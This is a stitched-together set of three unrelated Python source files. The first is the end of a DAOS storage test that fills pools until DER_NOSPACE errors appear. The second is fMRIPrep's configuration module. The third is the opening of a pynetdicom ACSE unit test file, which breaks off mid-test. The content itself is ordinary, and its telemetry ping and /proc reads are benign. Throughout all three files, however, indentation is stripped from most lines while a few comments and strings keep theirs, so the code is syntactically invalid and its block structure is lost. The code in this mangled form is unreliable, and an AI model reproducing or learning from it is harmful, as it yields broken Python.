        #moved to NVMe and SCM will keep filling. SCM will approach full and
        #this command is expected to fail with DER_NOSPACE.
try:
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=60)
            self.fail('This test is expected to FAIL because of DER_NOSPACE '
                      'but it passed')
except TestFail as _error:
self.log.info('Test expected to fail because of DER_NOSPACE')
#Display the pool%
print(self.pool.pool_percentage_used())
        #Verify the DER_NOSPACE error count is as expected and there are no
        #other errors in the client log
self.verify_enspace_log(self.der_nospace_count)
#Check both NVMe and SCM are full.
pool_usage = self.pool.pool_percentage_used()
        #NVMe should be almost full; if not, the test will fail.
if pool_usage['nvme'] > 8:
self.fail('Pool NVMe used percentage should be < 8%, instead {}'.
format(pool_usage['nvme']))
        #Some SCM space is used by the system, so SCM won't be 100% full.
if pool_usage['scm'] > 50:
self.fail('Pool SCM used percentage should be < 50%, instead {}'.
format(pool_usage['scm']))
def run_enospace_with_bg_job(self):
"""
        Run the test and validate DER_NOSPACE and the expected storage size.
        A single IOR job will run in the background while space is filling.
"""
        #Get the initial DER_NOSPACE count
self.der_nospace_count, self.other_errors_count = error_count(
"-1007", self.hostlist_clients, self.client_log)
# Start the IOR Background thread which will write small data set and
# read in loop, until storage space is full.
job = threading.Thread(target=self.ior_bg_thread)
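        # Daemon thread so the background IOR loop cannot block interpreter exit.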
job.daemon = True
job.start()
#Run IOR in Foreground
self.run_enospace_foreground()
# Verify the background job result has no FAIL for any IOR run
for _result in self.test_result:
if "FAIL" in _result:
self.fail("One of the Background IOR job failed")
def test_enospace_lazy_with_bg(self):
"""Jira ID: DAOS-4756.
        Test Description: IO gets DER_NOSPACE when SCM and NVMe are full with
                          the default (lazy) aggregation mode.
        Use Case: This test will create the pool and fill 75% of the SCM size,
                  which will trigger aggregation because of space pressure,
                  then fill 75% more, which should fill NVMe. Try to fill 60%
                  more and now the SCM size will be full too.
                  Verify that the last IO fails with DER_NOSPACE and the
                  SCM/NVMe pool capacity is full. One background IO job will
                  be running continuously.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=nvme,der_enospace,enospc_lazy,enospc_lazy_bg
"""
print(self.pool.pool_percentage_used())
#Run IOR to fill the pool.
self.run_enospace_with_bg_job()
def test_enospace_lazy_with_fg(self):
"""Jira ID: DAOS-4756.
        Test Description: Fill up the system (default aggregation mode) and
                          delete all containers in a loop, which should release
                          the space.
        Use Case: This test will create the pool and fill 75% of the SCM size,
                  which will trigger aggregation because of space pressure,
                  then fill 75% more, which should fill NVMe. Try to fill 60%
                  more and now the SCM size will be full too.
                  Verify that the last IO fails with DER_NOSPACE and the
                  SCM/NVMe pool capacity is full. Delete all the containers.
                  Do this in a loop 10 times and verify the space is released.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=nvme,der_enospace,enospc_lazy,enospc_lazy_fg
"""
print(self.pool.pool_percentage_used())
        #Repeat the test in a loop.
for _loop in range(10):
print("-------enospc_lazy_fg Loop--------- {}".format(_loop))
#Run IOR to fill the pool.
self.run_enospace_foreground()
#Delete all the containers
self.delete_all_containers()
            #Container deletion takes some time to release the space
time.sleep(60)
#Run last IO
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=1)
def test_enospace_time_with_bg(self):
"""Jira ID: DAOS-4756.
        Test Description: IO gets DER_NOSPACE when SCM is full, and the space
                          is released when the container is destroyed, with
                          aggregation set to time mode.
        Use Case: This test will create the pool. Set the aggregation mode to
                  Time. Start filling 75% of the SCM size. Aggregation will be
                  triggered from time to time, then fill 75% more, which will
                  fill up NVMe. Try to fill 60% more and now the SCM size will
                  be full too. Verify the last IO fails with DER_NOSPACE and
                  the SCM/NVMe pool capacity is full. One background IO job
                  will be running continuously.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=nvme,der_enospace,enospc_time,enospc_time_bg
"""
print(self.pool.pool_percentage_used())
        # Enable Time mode for aggregation.
self.pool.set_property("reclaim", "time")
#Run IOR to fill the pool.
self.run_enospace_with_bg_job()
def test_enospace_time_with_fg(self):
"""Jira ID: DAOS-4756.
        Test Description: Fill up the system (time aggregation mode) and
                          delete all containers in a loop, which should release
                          the space.
        Use Case: This test will create the pool. Set the aggregation mode to
                  Time. Start filling 75% of the SCM size. Aggregation will be
                  triggered from time to time, then fill 75% more, which will
                  fill up NVMe. Try to fill 60% more and now the SCM size will
                  be full too. Verify the last IO fails with DER_NOSPACE and
                  the SCM/NVMe pool capacity is full. Delete all the containers.
                  Do this in a loop 10 times and verify the space is released.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=nvme,der_enospace,enospc_time,enospc_time_fg
"""
print(self.pool.pool_percentage_used())
        # Enable Time mode for aggregation.
self.pool.set_property("reclaim", "time")
        #Repeat the test in a loop.
for _loop in range(10):
print("-------enospc_time_fg Loop--------- {}".format(_loop))
print(self.pool.pool_percentage_used())
#Run IOR to fill the pool.
self.run_enospace_with_bg_job()
#Delete all the containers
self.delete_all_containers()
            #Container deletion takes some time to release the space
time.sleep(60)
#Run last IO
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=1)
@skipForTicket("DAOS-8896")
def test_performance_storage_full(self):
"""Jira ID: DAOS-4756.
Test Description: Verify IO Read performance when pool size is full.
        Use Case: This test will create the pool. Run a small set of IOR as a
                  baseline. Start IOR with < 4K transfers, which will start
                  filling SCM, trigger aggregation and start filling up NVMe.
                  Check the IOR baseline read number and make sure it is within
                  +-5% of the number measured before the storage was full.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=nvme,der_enospace,enospc_performance
"""
#Write the IOR Baseline and get the Read BW for later comparison.
print(self.pool.pool_percentage_used())
#Write First
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=1)
#Read the baseline data set
self.start_ior_load(storage='SCM', operation='Auto_Read', percent=1)
max_mib_baseline = float(self.ior_matrix[0][int(IorMetrics.Max_MiB)])
baseline_cont_uuid = self.ior_cmd.dfs_cont.value
print("IOR Baseline Read MiB {}".format(max_mib_baseline))
#Run IOR to fill the pool.
self.run_enospace_with_bg_job()
#Read the same container which was written at the beginning.
self.container.uuid = baseline_cont_uuid
self.start_ior_load(storage='SCM', operation='Auto_Read', percent=1)
max_mib_latest = float(self.ior_matrix[0][int(IorMetrics.Max_MiB)])
print("IOR Latest Read MiB {}".format(max_mib_latest))
        #Check that the latest IOR read performance is within the 5% tolerance
        #when storage space is full.
        if abs(max_mib_baseline-max_mib_latest) > (max_mib_baseline/100 * 5):
            self.fail('Latest IOR read performance is not within the 5% '
                      'tolerance. Baseline Read MiB = {} and latest IOR Read '
                      'MiB = {}'
                      .format(max_mib_baseline, max_mib_latest))
def test_enospace_no_aggregation(self):
"""Jira ID: DAOS-4756.
        Test Description: IO gets DER_NOSPACE when SCM is full, and the space
                          is released when the container is destroyed, with
                          aggregation disabled.
        Use Case: This test will create the pool and disable aggregation. Fill
                  75% of the SCM size, which should work, then try to fill 10%
                  more, which should fail with DER_NOSPACE. Destroy the
                  container and validate that the pool SCM free size is close
                  to full (> 95%). Do this in a loop ~10 times and verify the
                  DER_NOSPACE count and SCM free size after container destroy.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=nvme,der_enospace,enospc_no_aggregation
"""
# pylint: disable=attribute-defined-outside-init
# pylint: disable=too-many-branches
print(self.pool.pool_percentage_used())
# Disable the aggregation
self.pool.set_property("reclaim", "disabled")
#Get the DER_NOSPACE and other error count from log
self.der_nospace_count, self.other_errors_count = error_count(
"-1007", self.hostlist_clients, self.client_log)
        #Repeat the test in a loop.
for _loop in range(10):
print("-------enospc_no_aggregation Loop--------- {}".format(_loop))
            #Fill 40% of the SCM pool
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=40)
print(self.pool.pool_percentage_used())
try:
                #Fill 40% more of SCM, which should fail because no SCM space is left
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=40)
                self.fail('This test is expected to fail because of DER_NOSPACE '
                          'but it passed')
except TestFail as _error:
self.log.info('Expected to fail because of DER_NOSPACE')
            #Verify the DER_NOSPACE error count is as expected and there are no
            #other errors in the client log.
self.verify_enspace_log(self.der_nospace_count)
#Delete all the containers
self.delete_all_containers()
            #Wait for the container deletion to release the SCM space.
            time.sleep(60)
            #Get the pool usage
            pool_usage = self.pool.pool_percentage_used()
            print(pool_usage)
            #SCM pool space should be released (some is still used by the system)
#Pool SCM free % should not be less than 62%
if pool_usage['scm'] > 62:
self.fail('SCM pool used percentage should be < 62, instead {}'.
format(pool_usage['scm']))
#Run last IO
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=1)
|
config.py
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
r"""
A Python module to maintain unique, run-wide *fMRIPrep* settings.
This module implements the memory structures to keep a consistent, singleton config.
Settings are passed across processes via filesystem, and a copy of the settings for
each run and subject is left under
``<output_dir>/sub-<participant_id>/log/<run_unique_id>/fmriprep.toml``.
Settings are stored using :abbr:`TOML (Tom's Obvious, Minimal Language)`.
The module has a :py:func:`~fmriprep.config.to_filename` function to allow writing out
the settings to hard disk in *ToML* format, which looks like:
.. literalinclude:: ../fmriprep/data/tests/config.toml
:language: toml
:name: fmriprep.toml
:caption: **Example file representation of fMRIPrep settings**.
This config file is used to pass the settings across processes,
using the :py:func:`~fmriprep.config.load` function.
Configuration sections
----------------------
.. autoclass:: environment
:members:
.. autoclass:: execution
:members:
.. autoclass:: workflow
:members:
.. autoclass:: nipype
:members:
Usage
-----
A config file is used to pass settings and collect information as the execution
graph is built across processes.
.. code-block:: Python
from fmriprep import config
config_file = config.execution.work_dir / '.fmriprep.toml'
config.to_filename(config_file)
# Call build_workflow(config_file, retval) in a subprocess
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
config.load(config_file)
# Access configs from any code section as:
value = config.section.setting
Logging
-------
.. autoclass:: loggers
:members:
Other responsibilities
----------------------
The :py:mod:`config` module is responsible for other convenience actions.
* Switching Python's :obj:`multiprocessing` to *forkserver* mode.
* Setting up a filter for warnings as early as possible.
* Automated I/O magic operations. Some conversions need to happen in the
store/load processes (e.g., from/to :obj:`~pathlib.Path` \<-\> :obj:`str`,
:py:class:`~bids.layout.BIDSLayout`, etc.)
"""
import os
from multiprocessing import set_start_method
# Disable NiPype etelemetry always
_disable_et = bool(os.getenv("NO_ET") is not None or os.getenv("NIPYPE_NO_ET") is not None)
os.environ["NIPYPE_NO_ET"] = "1"
os.environ["NO_ET"] = "1"
try:
set_start_method('forkserver')
except RuntimeError:
pass # context has been already set
finally:
# Defer all custom import for after initializing the forkserver and
# ignoring the most annoying warnings
import sys
import random
from uuid import uuid4
from pathlib import Path
from time import strftime
from nipype import logging as nlogging, __version__ as _nipype_ver
from templateflow import __version__ as _tf_ver
from . import __version__
if not hasattr(sys, "_is_pytest_session"):
sys._is_pytest_session = False # Trick to avoid sklearn's FutureWarnings
# Disable all warnings in main and children processes only on production versions
if not any((
"+" in __version__,
__version__.endswith(".dirty"),
os.getenv("FMRIPREP_DEV", "0").lower() in ("1", "on", "true", "y", "yes")
)):
from ._warnings import logging
os.environ["PYTHONWARNINGS"] = "ignore"
elif os.getenv("FMRIPREP_WARNINGS", "0").lower() in ("1", "on", "true", "y", "yes"):
# allow disabling warnings on development versions
# https://github.com/poldracklab/fmriprep/pull/2080#discussion_r409118765
from ._warnings import logging
else:
import logging
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
DEFAULT_MEMORY_MIN_GB = 0.01
# Ping NiPype eTelemetry once if env var was not set
# workers on the pool will have the env variable set from the master process
if not _disable_et:
# Just get so analytics track one hit
from contextlib import suppress
from requests import get as _get_url, ConnectionError, ReadTimeout
with suppress((ConnectionError, ReadTimeout)):
_get_url("https://rig.mit.edu/et/projects/nipy/nipype", timeout=0.05)
# Execution environment
_exec_env = os.name
_docker_ver = None
# special variable set in the container
if os.getenv('IS_DOCKER_8395080871'):
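    # Default to Singularity; refine to (fmriprep-)docker if /proc/1/cgroup mentions docker.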
_exec_env = 'singularity'
_cgroup = Path('/proc/1/cgroup')
if _cgroup.exists() and 'docker' in _cgroup.read_text():
_docker_ver = os.getenv('DOCKER_VERSION_8395080871')
_exec_env = 'fmriprep-docker' if _docker_ver else 'docker'
del _cgroup
_fs_license = os.getenv('FS_LICENSE')
if not _fs_license and os.getenv('FREESURFER_HOME'):
_fs_home = os.getenv('FREESURFER_HOME')
if _fs_home and (Path(_fs_home) / "license.txt").is_file():
_fs_license = str(Path(_fs_home) / "license.txt")
del _fs_home
_templateflow_home = Path(os.getenv(
'TEMPLATEFLOW_HOME',
os.path.join(os.getenv('HOME'), '.cache', 'templateflow'))
)
try:
from psutil import virtual_memory
_free_mem_at_start = round(virtual_memory().free / 1024**3, 1)
except Exception:
_free_mem_at_start = None
_oc_limit = 'n/a'
_oc_policy = 'n/a'
try:
# Memory policy may have a large effect on types of errors experienced
_proc_oc_path = Path('/proc/sys/vm/overcommit_memory')
if _proc_oc_path.exists():
_oc_policy = {
'0': 'heuristic', '1': 'always', '2': 'never'
}.get(_proc_oc_path.read_text().strip(), 'unknown')
if _oc_policy != 'never':
_proc_oc_kbytes = Path('/proc/sys/vm/overcommit_kbytes')
if _proc_oc_kbytes.exists():
_oc_limit = _proc_oc_kbytes.read_text().strip()
if _oc_limit in ('0', 'n/a') and Path('/proc/sys/vm/overcommit_ratio').exists():
_oc_limit = '{}%'.format(
Path('/proc/sys/vm/overcommit_ratio').read_text().strip()
)
except Exception:
pass
class _Config:
"""An abstract class forbidding instantiation."""
_paths = tuple()
def __init__(self):
"""Avert instantiation."""
raise RuntimeError('Configuration type is not instantiable.')
@classmethod
def load(cls, settings, init=True):
"""Store settings from a dictionary."""
for k, v in settings.items():
if v is None:
continue
if k in cls._paths:
setattr(cls, k, Path(v).absolute())
continue
if hasattr(cls, k):
setattr(cls, k, v)
if init:
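            # Sections that do not define an init() classmethod are simply skipped here.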
try:
cls.init()
except AttributeError:
pass
@classmethod
def get(cls):
"""Return defined settings."""
from niworkflows.utils.spaces import SpatialReferences, Reference
out = {}
for k, v in cls.__dict__.items():
if k.startswith('_') or v is None:
continue
if callable(getattr(cls, k)):
continue
if k in cls._paths:
v = str(v)
if isinstance(v, SpatialReferences):
v = " ".join([str(s) for s in v.references]) or None
if isinstance(v, Reference):
v = str(v) or None
out[k] = v
return out
class environment(_Config):
"""
Read-only options regarding the platform and environment.
Crawls runtime descriptive settings (e.g., default FreeSurfer license,
execution environment, nipype and *fMRIPrep* versions, etc.).
The ``environment`` section is not loaded in from file,
only written out when settings are exported.
This config section is useful when reporting issues,
and these variables are tracked whenever the user does not
opt-out using the ``--notrack`` argument.
"""
cpu_count = os.cpu_count()
"""Number of available CPUs."""
exec_docker_version = _docker_ver
"""Version of Docker Engine."""
exec_env = _exec_env
"""A string representing the execution platform."""
free_mem = _free_mem_at_start
"""Free memory at start."""
overcommit_policy = _oc_policy
"""Linux's kernel virtual memory overcommit policy."""
overcommit_limit = _oc_limit
"""Linux's kernel virtual memory overcommit limits."""
nipype_version = _nipype_ver
"""Nipype's current version."""
templateflow_version = _tf_ver
"""The TemplateFlow client version installed."""
version = __version__
"""*fMRIPrep*'s version."""
class nipype(_Config):
"""Nipype settings."""
crashfile_format = 'txt'
"""The file format for crashfiles, either text or pickle."""
get_linked_libs = False
"""Run NiPype's tool to enlist linked libraries for every interface."""
memory_gb = None
"""Estimation in GB of the RAM this workflow can allocate at any given time."""
nprocs = os.cpu_count()
"""Number of processes (compute tasks) that can be run in parallel (multiprocessing only)."""
omp_nthreads = None
"""Number of CPUs a single process can access for multithreaded execution."""
plugin = 'MultiProc'
"""NiPype's execution plugin."""
plugin_args = {
'maxtasksperchild': 1,
'raise_insufficient': False,
}
"""Settings for NiPype's execution plugin."""
resource_monitor = False
"""Enable resource monitor."""
stop_on_first_crash = True
"""Whether the workflow should stop or continue after the first error."""
@classmethod
def get_plugin(cls):
"""Format a dictionary for Nipype consumption."""
out = {
'plugin': cls.plugin,
'plugin_args': cls.plugin_args,
}
if cls.plugin in ('MultiProc', 'LegacyMultiProc'):
out['plugin_args']['n_procs'] = int(cls.nprocs)
if cls.memory_gb:
out['plugin_args']['memory_gb'] = float(cls.memory_gb)
return out
@classmethod
def init(cls):
"""Set NiPype configurations."""
from nipype import config as ncfg
# Configure resource_monitor
if cls.resource_monitor:
ncfg.update_config({
'monitoring': {
'enabled': cls.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
ncfg.enable_resource_monitor()
# Nipype config (logs and execution)
ncfg.update_config({
'execution': {
'crashdump_dir': str(execution.log_dir),
'crashfile_format': cls.crashfile_format,
'get_linked_libs': cls.get_linked_libs,
'stop_on_first_crash': cls.stop_on_first_crash,
'check_version': False, # disable future telemetry
}
})
if cls.omp_nthreads is None:
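            # Default: use all but one of the allotted CPUs per process, capped at 8 threads.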
cls.omp_nthreads = min(cls.nprocs - 1 if cls.nprocs > 1 else os.cpu_count(), 8)
class execution(_Config):
"""Configure run-level settings."""
anat_derivatives = None
"""A path where anatomical derivatives are found to fast-track *sMRIPrep*."""
bids_dir = None
"""An existing path to the dataset, which must be BIDS-compliant."""
bids_description_hash = None
"""Checksum (SHA256) of the ``dataset_description.json`` of the BIDS dataset."""
bids_filters = None
"""A dictionary of BIDS selection filters."""
boilerplate_only = False
"""Only generate a boilerplate."""
debug = False
"""Run in sloppy mode (meaning, suboptimal parameters that minimize run-time)."""
echo_idx = None
"""Select a particular echo for multi-echo EPI datasets."""
fs_license_file = _fs_license
"""An existing file containing a FreeSurfer license."""
fs_subjects_dir = None
"""FreeSurfer's subjects directory."""
layout = None
"""A :py:class:`~bids.layout.BIDSLayout` object, see :py:func:`init`."""
log_dir = None
"""The path to a directory that contains execution logs."""
log_level = 25
"""Output verbosity."""
low_mem = None
"""Utilize uncompressed NIfTIs and other tricks to minimize memory allocation."""
md_only_boilerplate = False
"""Do not convert boilerplate from MarkDown to LaTex and HTML."""
notrack = False
"""Do not monitor *fMRIPrep* using Sentry.io."""
output_dir = None
"""Folder where derivatives will be stored."""
output_spaces = None
"""List of (non)standard spaces designated (with the ``--output-spaces`` flag of
the command line) as spatial references for outputs."""
reports_only = False
"""Only build the reports, based on the reportlets found in a cached working directory."""
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid4())
"""Unique identifier of this particular run."""
participant_label = None
"""List of participant identifiers that are to be preprocessed."""
task_id = None
"""Select a particular task from all available in the dataset."""
templateflow_home = _templateflow_home
"""The root folder of the TemplateFlow client."""
work_dir = Path('work').absolute()
"""Path to a working directory where intermediate results will be available."""
write_graph = False
"""Write out the computational graph corresponding to the planned preprocessing."""
_layout = None
_paths = (
'anat_derivatives',
'bids_dir',
'fs_license_file',
'fs_subjects_dir',
'layout',
'log_dir',
'output_dir',
'templateflow_home',
'work_dir',
)
@classmethod
def init(cls):
"""Create a new BIDS Layout accessible with :attr:`~execution.layout`."""
if cls.fs_license_file and Path(cls.fs_license_file).is_file():
os.environ["FS_LICENSE"] = str(cls.fs_license_file)
if cls._layout is None:
import re
from bids.layout import BIDSLayout
work_dir = cls.work_dir / 'bids.db'
work_dir.mkdir(exist_ok=True, parents=True)
cls._layout = BIDSLayout(
str(cls.bids_dir),
validate=False,
# database_path=str(work_dir),
ignore=("code", "stimuli", "sourcedata", "models",
"derivatives", re.compile(r'^\.')))
cls.layout = cls._layout
if cls.bids_filters:
from bids.layout import Query
# unserialize pybids Query enum values
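            # e.g. a serialized string like "<Query.NONE: 1>" is mapped back to the Query enum member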
for acq, filters in cls.bids_filters.items():
cls.bids_filters[acq] = {
k: getattr(Query, v[7:-4]) if not isinstance(v, Query) and 'Query' in v else v
for k, v in filters.items()}
# These variables are not necessary anymore
del _fs_license
del _exec_env
del _nipype_ver
del _templateflow_home
del _tf_ver
del _free_mem_at_start
del _oc_limit
del _oc_policy
class workflow(_Config):
"""Configure the particular execution graph of this workflow."""
anat_only = False
"""Execute the anatomical preprocessing only."""
aroma_err_on_warn = None
"""Cast AROMA warnings to errors."""
aroma_melodic_dim = None
"""Number of ICA components to be estimated by MELODIC
(positive = exact, negative = maximum)."""
bold2t1w_dof = None
"""Degrees of freedom of the BOLD-to-T1w registration steps."""
bold2t1w_init = 'register'
"""Whether to use standard coregistration ('register') or to initialize coregistration from the
BOLD image-header ('header')."""
cifti_output = None
"""Generate HCP Grayordinates, accepts either ``'91k'`` (default) or ``'170k'``."""
dummy_scans = None
"""Set a number of initial scans to be considered nonsteady states."""
fmap_bspline = None
"""Regularize fieldmaps with a field of B-Spline basis."""
fmap_demean = None
"""Remove the mean from fieldmaps."""
force_syn = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation."""
hires = None
"""Run FreeSurfer ``recon-all`` with the ``-hires`` flag."""
ignore = None
"""Ignore particular steps for *fMRIPrep*."""
longitudinal = False
"""Run FreeSurfer ``recon-all`` with the ``-logitudinal`` flag."""
random_seed = None
"""Master random seed to initialize the Pseudorandom Number Generator (PRNG)"""
medial_surface_nan = None
"""Fill medial surface with :abbr:`NaNs (not-a-number)` when sampling."""
regressors_all_comps = None
"""Return all CompCor components."""
regressors_dvars_th = None
"""Threshold for DVARS."""
regressors_fd_th = None
"""Threshold for :abbr:`FD (frame-wise displacement)`."""
run_reconall = True
"""Run FreeSurfer's surface reconstruction."""
skull_strip_fixed_seed = False
"""Fix a seed for skull-stripping."""
skull_strip_template = "OASIS30ANTs"
"""Change default brain extraction template."""
skull_strip_t1w = "force"
"""Skip brain extraction of the T1w image (default is ``force``, meaning that
*fMRIPrep* will run brain extraction of the T1w)."""
spaces = None
"""Keeps the :py:class:`~niworkflows.utils.spaces.SpatialReferences`
instance keeping standard and nonstandard spaces."""
use_aroma = None
"""Run ICA-:abbr:`AROMA (automatic removal of motion artifacts)`."""
use_bbr = None
"""Run boundary-based registration for BOLD-to-T1w registration."""
use_syn_sdc = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation
in the absence of any alternatives."""
class loggers:
"""Keep loggers easily accessible (see :py:func:`init`)."""
_fmt = "%(asctime)s,%(msecs)d %(name)-2s " "%(levelname)-2s:\n\t %(message)s"
_datefmt = "%y%m%d-%H:%M:%S"
default = logging.getLogger()
"""The root logger."""
cli = logging.getLogger('cli')
"""Command-line interface logging."""
workflow = nlogging.getLogger('nipype.workflow')
"""NiPype's workflow logger."""
interface = nlogging.getLogger('nipype.interface')
"""NiPype's interface logger."""
utils = nlogging.getLogger('nipype.utils')
"""NiPype's utils logger."""
@classmethod
def init(cls):
"""
Set the log level, initialize all loggers into :py:class:`loggers`.
* Add new logger levels (25: IMPORTANT, and 15: VERBOSE).
* Add a new sub-logger (``cli``).
* Logger configuration.
"""
from nipype import config as ncfg
_handler = logging.StreamHandler(stream=sys.stdout)
_handler.setFormatter(
logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt)
)
cls.cli.addHandler(_handler)
cls.default.setLevel(execution.log_level)
cls.cli.setLevel(execution.log_level)
cls.interface.setLevel(execution.log_level)
cls.workflow.setLevel(execution.log_level)
cls.utils.setLevel(execution.log_level)
ncfg.update_config({
'logging': {
'log_directory': str(execution.log_dir),
'log_to_file': True
},
})
class seeds(_Config):
"""Initialize the PRNG and track random seed assignments"""
master = None
"""Master seed used to generate all other tracked seeds"""
ants = None
"""Seed used for antsRegistration, antsAI, antsMotionCorr"""
@classmethod
def init(cls):
cls.master = workflow.random_seed
if cls.master is None:
cls.master = random.randint(1, 65536)
random.seed(cls.master) # initialize the PRNG
# functions to set program specific seeds
cls.ants = _set_ants_seed()
def _set_ants_seed():
"""Fix random seed for antsRegistration, antsAI, antsMotionCorr"""
val = random.randint(1, 65536)
os.environ['ANTS_RANDOM_SEED'] = str(val)
return val
def from_dict(settings):
"""Read settings from a flat dictionary."""
nipype.load(settings)
execution.load(settings)
workflow.load(settings)
seeds.init()
loggers.init()
def load(filename):
"""Load settings from file."""
from toml import loads
filename = Path(filename)
settings = loads(filename.read_text())
for sectionname, configs in settings.items():
if sectionname != 'environment':
section = getattr(sys.modules[__name__], sectionname)
section.load(configs)
init_spaces()
def get(flat=False):
"""Get config as a dict."""
settings = {
'environment': environment.get(),
'execution': execution.get(),
'workflow': workflow.get(),
'nipype': nipype.get(),
'seeds': seeds.get(),
}
if not flat:
return settings
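    # Flatten into dotted keys, e.g. {'execution.work_dir': ...}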
return {'.'.join((section, k)): v
for section, configs in settings.items()
for k, v in configs.items()}
def dumps():
"""Format config into toml."""
from toml import dumps
return dumps(get())
def to_filename(filename):
"""Write settings to file."""
filename = Path(filename)
filename.write_text(dumps())
def init_spaces(checkpoint=True):
"""Initialize the :attr:`~workflow.spaces` setting."""
from niworkflows.utils.spaces import Reference, SpatialReferences
spaces = execution.output_spaces or SpatialReferences()
if not isinstance(spaces, SpatialReferences):
spaces = SpatialReferences(
[ref for s in spaces.split(' ')
for ref in Reference.from_string(s)]
)
if checkpoint and not spaces.is_cached():
spaces.checkpoint()
# Add the default standard space if not already present (required by several sub-workflows)
if "MNI152NLin2009cAsym" not in spaces.get_spaces(nonstandard=False, dim=(3,)):
spaces.add(
Reference("MNI152NLin2009cAsym", {})
)
# Ensure user-defined spatial references for outputs are correctly parsed.
# Certain options require normalization to a space not explicitly defined by users.
# These spaces will not be included in the final outputs.
if workflow.use_aroma:
# Make sure there's a normalization to FSL for AROMA to use.
spaces.add(
Reference("MNI152NLin6Asym", {"res": "2"})
)
cifti_output = workflow.cifti_output
if cifti_output:
# CIFTI grayordinates to corresponding FSL-MNI resolutions.
vol_res = '2' if cifti_output == '91k' else '1'
spaces.add(
Reference("fsaverage", {"den": "164k"})
)
spaces.add(
Reference("MNI152NLin6Asym", {"res": vol_res})
)
# Make the SpatialReferences object available
workflow.spaces = spaces
|
test_acse.py
|
"""Unit tests for ACSE"""
from datetime import datetime
import logging
import queue
import select
import socket
from struct import pack, unpack
import sys
import time
import threading
import pytest
from pynetdicom import (
AE,
VerificationPresentationContexts,
PYNETDICOM_IMPLEMENTATION_UID,
PYNETDICOM_IMPLEMENTATION_VERSION,
build_context,
evt,
_config,
debug_logger,
)
from pynetdicom.acse import ACSE
from pynetdicom.association import Association, ServiceUser
from pynetdicom.dimse_messages import DIMSEMessage, C_ECHO_RQ, C_ECHO_RSP
from pynetdicom.events import Event
from pynetdicom.pdu_primitives import (
A_ASSOCIATE,
A_RELEASE,
A_ABORT,
A_P_ABORT,
MaximumLengthNotification,
ImplementationClassUIDNotification,
ImplementationVersionNameNotification,
UserIdentityNegotiation,
SOPClassExtendedNegotiation,
SOPClassCommonExtendedNegotiation,
AsynchronousOperationsWindowNegotiation,
SCP_SCU_RoleSelectionNegotiation,
)
from pynetdicom.pdu import P_DATA_TF
from pynetdicom.sop_class import Verification, CTImageStorage
from pynetdicom.transport import AssociationSocket
from .encoded_pdu_items import (
a_associate_rq,
a_associate_ac,
a_release_rq,
a_release_rp,
p_data_tf,
a_abort,
a_p_abort,
)
from .parrot import ThreadedParrot, ParrotRequest
# debug_logger()
class DummyAssociationSocket:
def __init__(self):
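        # A stand-in socket that always reports itself as ready and connected.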
self._ready = threading.Event()
self._ready.set()
self._is_connected = True
class DummyDUL:
def __init__(self):
self.queue = queue.Queue()
self.received = queue.Queue()
self.is_killed = False
self.socket = DummyAssociationSocket()
def send_pdu(self, primitive):
self.queue.put(primitive)
def peek_next_pdu(self):
"""Check the next PDU to be processed."""
try:
# Looks at next item without retrieving it
return self.queue.queue[0]
except (queue.Empty, IndexError):
return None
def receive_pdu(self, wait=False, timeout=None):
# Takes item off the queue
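        # Note: the positional arguments map to queue.Queue.get(block, timeout).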
return self.queue.get(wait, timeout)
def kill_dul(self):
self.is_killed = True
class DummyAssociation:
def __init__(self):
self.ae = AE()
self.mode = None
self.dul = DummyDUL()
self.requestor = ServiceUser(self, "requestor")
self.requestor.port = 11112
self.requestor.ae_title = "TEST_LOCAL"
self.requestor.address = "127.0.0.1"
self.requestor.maximum_length = 31682
self.acceptor = ServiceUser(self, "acceptor")
self.acceptor.ae_title = "TEST_REMOTE"
self.acceptor.port = 11113
self.acceptor.address = "127.0.0.2"
self.acse_timeout = 11
self.dimse_timeout = 12
self.network_timeout = 13
self.is_killed = False
self.is_aborted = False
self.is_established = False
self.is_rejected = False
self.is_released = False
self.is_acceptor = False
self.is_requestor = True
self._handlers = {}
def abort(self):
self.is_aborted = True
self.kill()
def kill(self):
self.is_killed = True
@property
def requested_contexts(self):
return self.requestor.get_contexts("requested")
@property
def supported_contexts(self):
return self.requestor.get_contexts("supported")
def get_handlers(self, event):
if event not in self._handlers:
return []
return self._handlers[event]
class TestACSE:
"""Tests for initialising the ACSE class"""
def setup(self):
self.assoc = DummyAssociation()
self.assoc.requestor.requested_contexts = [build_context("1.2.840.10008.1.1")]
def test_default(self):
"""Test default initialisation"""
acse = ACSE(self.assoc)
assert hasattr(acse, "acse_timeout") is True
def test_is_aborted(self):
"""Test ACSE.is_aborted"""
acse = ACSE(self.assoc)
assert acse.is_aborted() is False
# "Received" A-ABORT
acse.send_abort(0x02)
assert acse.is_aborted() is True
self.assoc.dul.queue.get()
with pytest.raises(queue.Empty):
self.assoc.dul.queue.get(block=False)
assert acse.is_aborted() is False
# "Received" A-P-ABORT
acse.send_ap_abort(0x02)
assert acse.is_aborted() is True
def test_is_release_requested(self):
"""Test ACSE.is_release_requested"""
acse = ACSE(self.assoc)
assert acse.is_release_requested() is False
acse.send_release()
assert acse.is_release_requested() is True
with pytest.raises(queue.Empty):
